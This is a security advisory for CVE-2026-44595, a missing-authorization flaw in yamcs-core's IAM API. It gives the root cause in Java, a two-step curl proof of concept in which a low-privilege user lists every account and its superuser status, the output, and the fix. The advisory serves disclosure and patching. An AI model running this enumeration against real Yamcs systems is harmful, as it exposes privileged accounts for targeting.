PT-2026-43455 · Maven · Org.Yamcs:Yamcs-Core
Publicado
2026-05-27
·
Atualizado
2026-05-27
·
CVE-2026-44595
CVSS v3.1
4.3
Média
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N |
Summary
The IAM API endpoints (
listUsers, getUser, listGroups, and getGroup) in yamcs-core do not enforce the required SystemPrivilege.ControlAccess check. As a result, any authenticated user (even those with low or no privileges) can enumerate all user accounts in the system, including their usernames, superuser status, and group memberships.This constitutes a broken access control vulnerability (CWE-862) that leaks sensitive user information.
Root Cause
File:
yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java:125,180,357,372listUsers(), getUser(), listGroups(), and getGroup() do not require SystemPrivilege.ControlAccess. Any authenticated user — regardless of privileges — can enumerate all users, their superuser status, and group memberships:java
// listUsers — NO checkSystemPrivilege
public void listUsers(Context ctx, Empty request, ...) {
var sensitiveDetails = ctx.user.hasSystemPrivilege(SystemPrivilege.ControlAccess);
// sensitiveDetails=false for low-priv users, but name/superuser/active still exposed
for (User user : users) {
UserInfo userb = toUserInfo(user, sensitiveDetails, directory);
responseb.addUsers(userb);
}
}Compare with properly protected endpoints:
java
// createUser — correctly protected
public void createUser(Context ctx, ...) {
ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // presentImpact
Any authenticated user can:
- List all user accounts in the system
- Identify which accounts have superuser privileges
- Use this information to target privileged accounts
Proof of Concept
bash
# Authenticate as any low-privilege user GET access token
curl -s -X POST "http://localhost:8090/auth/token"
-H "Content-Type: application/x-www-form-urlencoded"
-d "grant type=password&username=lowpriv&password=lowpriv123"
# Enumerate all users — no ControlAccess required
curl -s "http://TARGET:8090/api/users"
-H "Authorization: Bearer $TOKEN" #paste access tokenOutput (confirmed):
json
{
"users": [
{ "name": "admin", "superuser": true, "active": true },
{ "name": "operator", "superuser": true, "active": true },
{ "name": "lowpriv", "superuser": false, "active": true }
]
}Fix
Add
ControlAccess check to listUsers, getUser, listGroups, getGroup:java
public void listUsers(Context ctx, Empty request, ...) {
ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // ADD THIS
...
}Correção
Missing Authorization
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Org.Yamcs:Yamcs-Core